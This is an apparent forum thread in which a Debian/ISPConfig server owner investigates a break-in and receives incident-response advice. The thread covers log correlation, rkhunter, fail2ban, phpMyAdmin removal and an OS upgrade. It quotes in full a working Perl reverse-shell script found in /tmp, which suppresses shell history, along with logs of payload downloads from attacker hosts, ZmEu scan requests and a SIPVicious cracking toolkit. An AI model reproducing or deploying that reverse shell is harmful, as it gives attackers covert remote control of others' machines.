Noticed some issues with services down on my box and started looking through my logs. It appears that the machine has been hacked and I'm still trying to see if it is with a particular site or how they got in. I did find a file named back.txt that was just sitting in the /tmp directory.

Code:
    #!/usr/bin/perl
    use IO::Socket;
    $system = '/bin/bash';
    $ARGC=@ARGV;
    print "--== messing Machine ==-- \n\n";
    if ($ARGC!=2) {
      print "Usage: $0 [Host] [Port] \n\n";
      die "Ex: $0 127.0.0.1 2121 \n";
    }
    use Socket;
    use FileHandle;
    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
    connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
    print "[*] Spawning Shell \n";
    SOCKET->autoflush();
    open(STDIN, ">&SOCKET");
    open(STDOUT,">&SOCKET");
    open(STDERR,">&SOCKET");
    print "--== Thuraya Team ==-- \n\n";
    system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo; echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
    system($system);

I also see a lot of this in the logs

Code:
    72.249.74.26 - - [20/Sep/2010:23:50:04 -0500] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 364 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:08 -0500] "GET /admin/scripts/setup.php HTTP/1.1" 404 346 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:14 -0500] "GET /db/scripts/setup.php HTTP/1.1" 404 343 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 348 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /mysql/scripts/setup.php HTTP/1.1" 404 346 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 351 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 357 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /phpadmin/scripts/setup.php HTTP/1.1" 404 349 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 351 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 352 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /pma/scripts/setup.php HTTP/1.1" 404 344 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 355 "-" "ZmEu"
    72.249.74.26 - - [20/Sep/2010:23:50:26 -0500] "GET /web/scripts/setup.php HTTP/1.1" 404 344 "-" "ZmEu"

This seems to be a pretty common attack while searching the internet, but something seems to have clearly got access based on the file in tmp. Here is where I found the reference to back.txt, looks like it was grabbed from FTP:

Code:
    --10:18:55--  ftp://lifepark:*password*@61.220.169.154/.trash/robot.txt
               => `robot.txt'
    Connecting to 61.220.169.154:21... connected.
    Logging in as lifepark ... Logged in!
    ==> SYST ... done.    ==> PWD ... done.
    ==> TYPE I ... done.  ==> CWD /.trash ... done.
    ==> PASV ... done.    ==> RETR robot.txt ... done.

        0K .......... ......                                     25.11 KB/s

    10:18:58 (25.11 KB/s) - `robot.txt' saved [17177]

    kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
    join: missing operand
    Try `join --help' for more information.
    sh: http://mysql.gwshack.us/back.txt: No such file or directory
    sh: http://mysql.gwshack.us/back.txt: No such file or directory
    --10:32:13--  http://mysql.gwshack.us/back.txt
               => `back.txt'
    Resolving mysql.gwshack.us... 213.251.132.191
    Connecting to mysql.gwshack.us|213.251.132.191|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 892 [text/plain]

        0K                                                       100%  121.53 MB/s

    10:32:14 (121.53 MB/s) - `back.txt' saved [892/892]

This is a Debian 4 box that is updated along with the latest ISPConfig updates. One site is running WordPress which is also updated so I'm not sure where the vulnerability is. Any suggestions on which direction to move at this point to look for holes and clean things up?
First of all I'd run chkrootkit and rkhunter to see if there are any rootkits on your system. Then make sure that all your web applications (Wordpress, Joomla, etc.) are up to date.
Found a lot of new files today in /tmp. The owner of all appears to be www-data

Code:
    ls -la
    total 1400
    drwxrwxrwt  8 root     root       4096 Sep 22 16:55 .
    drwxr-xr-x 22 root     root       4096 Sep 21 21:08 ..
    drwxrwxrwt  2 root     root       4096 Sep 21 21:08 .ICE-unix
    drwxrwxrwt  2 root     root       4096 Sep 21 21:08 .X11-unix
    drwxr-xr-x  2 www-data www-data   4096 Sep 22 14:44 .session
    drwxr-xr-x  6 www-data www-data   4096 Mar 26 08:48 .svn
    -rwxr-xr-x  1 www-data www-data   4834 Mar 26 08:48 Changelog
    -rwxr-xr-x  1 www-data www-data   1361 Mar 26 08:48 README
    -rwxr-xr-x  1 www-data www-data    308 Mar 26 08:48 THANKS
    -rwxr-xr-x  1 www-data www-data     80 Mar 26 08:48 TODO
    -rwxr-xr-x  1 www-data www-data   2429 Sep 22 14:42 a
    -rwxr-xr-x  1 www-data www-data  36898 Sep  2 04:27 bfp
    -rwxr-xr-x  1 www-data www-data  20887 Sep  2 04:27 bfr
    drwxr-xr-x  5 www-data www-data   4096 Sep  2 04:27 bfr-1.6
    -rwxr-xr-x  1 www-data www-data   2010 Mar 26 09:18 crack
    -rwxr-xr-x  1 www-data www-data  65431 Sep  5 13:17 dictionar
    -rwxr-xr-x  1 www-data www-data     18 Sep  6 12:15 email
    srwx------  1 root     root          0 Sep 21 21:09 fail2ban.sock
    -rwxr-xr-x  1 www-data www-data  12175 Mar 26 08:48 fphelper.py
    -rwxr-xr-x  1 www-data www-data  12288 Mar 26 08:48 groupdb
    -rwxr-xr-x  1 www-data www-data  36772 Mar 26 08:48 helper.py
    -rwxr-xr-x  1 www-data www-data  36024 Mar 26 08:48 helper.pyc
    -rwxr-xr-x  1 www-data www-data   1833 Mar 26 09:18 install
    -rwxr-xr-x  1 www-data www-data    143 Mar 26 08:48 kill
    -rwxr-xr-x  1 www-data www-data    568 Mar 26 09:18 lib.sh
    -rwxr-xr-x  1 www-data www-data   4298 Mar 26 08:48 pptable.py
    -rwxr-xr-x  1 www-data www-data   4998 Mar 26 08:48 pptable.pyc
    -rwxr-xr-x  1 www-data www-data   4229 Mar 26 08:48 regen.py
    drwxr-xr-x  2 www-data www-data   4096 Mar 26 08:48 results
    -rwxr-xr-x  1 www-data www-data   1509 Mar 26 09:18 scan
    -rwxr-xr-x  1 www-data www-data 512766 Sep  6 14:17 sip.tgz
    -rwxr-xr-x  1 www-data www-data 110592 Mar 26 08:48 staticfull
    -rwxr-xr-x  1 www-data www-data 282624 Mar 26 08:48 staticheaders
    -rwxr-xr-x  1 www-data www-data    749 Mar 26 08:48 sv.xsl
    -rwxr-xr-x  1 www-data www-data  22222 Mar 26 08:48 svcrack.py
    -rwxr-xr-x  1 www-data www-data   9159 Mar 26 08:48 svlearnfp.py
    -rwxr-xr-x  1 www-data www-data  24601 Mar 26 08:48 svmap.py
    -rwxr-xr-x  1 www-data www-data  12852 Mar 26 08:48 svreport.py
    -rwxr-xr-x  1 www-data www-data  26016 Mar 26 08:48 svwar.py
    -rwxr-xr-x  1 www-data www-data   6152 Sep  2 04:27 timeout
    -rwxr-xr-x  1 www-data www-data   1619 Mar 26 08:48 timeout.c
    -rwxr-xr-x  1 www-data www-data  45056 Mar 26 08:48 totag

Take a look at the readme

Code:
    cat README
    Welcome to SIPVicious security tools.

    The 4 tools that you should be looking at are:
    - svmap
    - svwar
    - svcrack
    - svreport

    The tools:

    svmap - this is a sip scanner. When launched against ranges of ip address space, it will identify any SIP servers which it finds on the way. Also has the option to scan hosts on ranges of ports.

    svwar - identifies working extension lines on a PBX. A working extension is one that can be registered. Also tells you if the extension line requires authentication or not.

    svcrack - a password cracker making use of digest authentication. It is able to crack passwords on both registrar servers and proxy servers. Current cracking modes are either numeric ranges or words from dictionary files.

    svreport - able to manage sessions created by the rest of the tools and export to pdf, xml, csv and plain text.

    svlearnfp - allows you to generate new fingerprints by simply running the tool against a host. It will attempt to guess most values and allow you to save the information to the local fingerprint db. Then you can choose to upload it to the author so that it can be added to the database.

    For usage help make use of -h or --help switch.
    Also check out the wiki: http://code.google.com/p/sipvicious/w/list

    And if you're stuck you're welcome to contact the author.

    Sandro Gauci
    sandrogauc at gmail dot com

Rkhunter isn't finding anything. System is always up-to-date, WordPress is the newest version and only running on 1 site with suexec.
Fail2ban

Was the Fail2ban intrusion prevention framework installed? It's one of the recommended steps for ISPConfig (see The Perfect Server, page 4, #16 Install fail2ban). On ISPConfig 3: Monitor -> Logfiles -> Show fail2ban-Log
Yes, fail2ban is installed. Looks like this is coming from Japan, or at least the server the files were downloaded from. In /var/log/apache2/error.log I see

Code:
    --14:41:25--  http://61.115.230.118/icons/sip.tgz
               => `sip.tgz'
    Connecting to 61.115.230.118:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 512,766 (501K) [application/x-gzip]

        0K .......... .......... .......... .......... ..........  9%    8.68 KB/s
       50K .......... .......... .......... .......... .......... 19%    3.48 KB/s
      100K .......... .......... .......... .......... .......... 29%    7.66 KB/s
      150K .......... .......... .......... .......... .......... 39%    4.19 KB/s
      200K .......... .......... .......... .......... .......... 49%    5.63 KB/s
      250K .......... .......... .......... .......... .......... 59%    7.58 KB/s
      300K .......... .......... .......... .......... .......... 69%    7.43 KB/s
      350K .......... .......... .......... .......... .......... 79%    4.90 KB/s
      400K .......... .......... .......... .......... .......... 89%    8.46 KB/s
      450K .......... .......... .......... .......... .......... 99%   13.72 KB/s
      500K                                                       100%    1.31 MB/s

    14:42:52 (6.22 KB/s) - `sip.tgz' saved [512766/512766]

Code:
    whois 61.115.230.118
    [ JPNIC database provides information regarding IP address and ASN. Its use   ]
    [ is restricted to network administration purposes. For further information, ]
    [ use 'whois -h whois.nic.ad.jp help'. To only display English output,       ]
    [ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'.     ]

    Network Information:
    a. [Network Number]             61.115.230.0/24
    b. [Network Name]               AT-LINKNET
    g. [Organization]               Link Incorporated
    m. [Administrative Contact]     GO004JP
    n. [Technical Contact]          YI1082JP
    p. [Nameserver]                 dns1.atworks.co.jp
    p. [Nameserver]                 ns02.idc.jp
    p. [Nameserver]                 ns03.idc.jp
    [Assigned Date]                 2001/04/12
    [Return Date]
    [Last Update]                   2005/04/14 18:59:04(JST)

    Less Specific Info.
    ----------
    Yahoo Japan Corporation
          [Allocation]              61.115.224.0/20

    More Specific Info.
    ----------
    No match!!
grep through your apache logs for words like wget, curl, tar, exec, perl, and so on. They will most likely be using a script vulnerability to download, unpack, and run the files. That should show up what is being exploited. Also manually scroll through the logs at around the time you see that those files were downloaded. That may also give you some hints.
As the files are owned by www-data and rkhunter is not showing any problems, it might be that the hackers did not get root privileges yet. There had been a few vulnerabilities in phpmyadmin in the last months and your log output shows that they searched for phpmyadmin, so it might be that they went in through phpmyadmin. You wrote above that this is a Debian 4 system. I recommend that you update it to Debian 5. There is a howto from falko available here at howtoforge that describes the Debian 4 to 5 update procedure. Before you update, remove phpmyadmin with: apt-get remove --purge phpmyadmin and reinstall it after the update with: apt-get install phpmyadmin. You should also remove all these files in /tmp and then check your server in the next days to see if you notice any anomalous behaviour or higher load. You can also check your server with a portscanner from an external system to see if any ports are open that you don't want to be open.
Get the time stamp of that entry in the error log. Then try to match the error to a request in the access log so you can see what page they exploited to make it download this sip.tgz. Do the same thing with the file dates in /tmp: match the creation times to requests in the access log.
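One way to do the log correlation suggested in the last two replies (grep the access log for download/exec keywords, then match requests to the error-log timestamp), as an added Python example that is not from this thread. The log lines, the 198.51.100.x/203.0.113.x addresses and the date attached to the wget banner are constructed to resemble the ones posted above.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Apache "combined" log format, the layout of the access-log excerpts in this thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Download/execution tokens to grep for, as suggested above.
KEYWORDS = ("wget", "curl", "tar", "exec", "perl", "chmod")

# Constructed sample lines modelled on the thread (not copied from a real server).
SAMPLE_ACCESS_LOG = [
    '72.249.74.26 - - [20/Sep/2010:23:50:08 -0500] "GET /admin/scripts/setup.php HTTP/1.1" 404 346 "-" "ZmEu"',
    '198.51.100.7 - - [22/Sep/2010:14:41:23 -0500] "GET /gallery/view.php?id=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [22/Sep/2010:14:41:24 -0500] "GET /gallery/view.php?id=3;wget%20http://203.0.113.9/sip.tgz HTTP/1.1" 200 213 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [22/Sep/2010:16:10:02 -0500] "GET /index.php HTTP/1.1" 200 3321 "-" "Mozilla/5.0"',
]
# Time of the wget banner ("--14:41:25--") in error.log; the date (Sep 22) is assumed here.
ERROR_TS = datetime(2010, 9, 22, 14, 41, 25, tzinfo=timezone(timedelta(hours=-5)))


def parse_access_line(line):
    """Parse one combined-format line into a dict; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["decoded"] = unquote(rec["req"])  # so "wget%20http" matches the word wget
    return rec


def suspicious_requests(lines, keywords=KEYWORDS):
    """Requests whose URL-decoded request line contains a keyword as a whole word."""
    pat = re.compile(r"(?<![a-z])(?:" + "|".join(keywords) + r")(?![a-z])", re.I)
    recs = (parse_access_line(l) for l in lines)
    return [r for r in recs if r and pat.search(r["decoded"])]


def requests_near(lines, when, window=timedelta(seconds=120)):
    """Requests within +/- window of an error-log entry or a /tmp file timestamp."""
    recs = (parse_access_line(l) for l in lines)
    return [r for r in recs if r and abs(r["ts"] - when) <= window]
```

Run `suspicious_requests` over the whole access log first, then `requests_near` with the error-log time and with each /tmp file's mtime; the request that appears in both lists is the one to look at.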
Things have been ok since deleting all files that were downloaded. I went ahead and did an upgrade from etch to lenny today. The only concern I have is that it doesn't look like the kernel was upgraded.

Code:
    uname -r
    2.6.18-128.1.1.el5.028stab062.3

Any downside to using an older kernel? Debian version shows as lenny

Code:
    cat /etc/debian_version
    5.0.6

I'm just a little nervous about trying to upgrade the kernel on a remote system.
I would be concerned that there may be a security vulnerability in the old kernel. This seems like a good guide on performing the upgrade including the kernel: http://www.debianadmin.com/howto-upgrade-from-debian-etch-40-to-lenny-50.html